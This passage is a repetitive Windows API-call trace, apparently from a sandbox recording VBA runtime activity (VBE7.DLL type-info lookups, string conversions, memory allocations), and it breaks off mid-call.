ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.458] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.458] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.458] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.458] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.458] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.458] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.458] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.458] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.458] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.458] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.458] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.458] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.458] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.458] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.458] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.459] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.459] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.459] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.459] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.459] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a4470, cb=0x60) returned 0x1d39d848fb0 [0060.459] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3d20000 [0060.459] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.459] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.460] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.460] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.460] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.460] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.460] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.460] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.460] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.460] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.460] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.460] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.460] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.460] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.460] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.460] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.460] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.460] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.460] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.460] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.460] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.460] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.460] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.460] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.460] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.460] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.460] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.460] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.461] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.461] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.461] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.461] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.461] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.461] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.461] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.461] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.461] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.461] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.461] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.461] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.461] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.461] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.461] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.461] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.461] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.461] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.461] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.461] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.461] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.461] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.461] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.462] IUnknown:AddRef (This=0x1d39d9d5068) returned 0x3 [0060.462] IUnknown:Release (This=0x1d39d9d5068) returned 0x2 [0060.462] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.462] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3986370ec, cbMultiByte=0, lpWideCharStr=0x1d3a3d23c9c, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0060.462] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d5068, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.462] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.462] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.462] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.462] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.462] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.462] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.462] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3d30000 [0060.463] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.463] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.463] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.463] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.463] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.463] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.463] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.463] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.463] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.463] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.463] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.463] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.463] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.463] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.464] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.464] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.464] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.464] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.464] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.464] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.464] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.464] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.464] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.464] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.464] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.464] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.464] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.464] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.465] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.465] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.465] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.465] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.465] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.465] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.465] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.465] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.465] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.465] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.465] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.465] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.465] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.465] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.465] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.465] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.465] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.465] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.465] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.465] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.465] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.465] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.465] ITypeInfo:RemoteGetDllEntry (in: 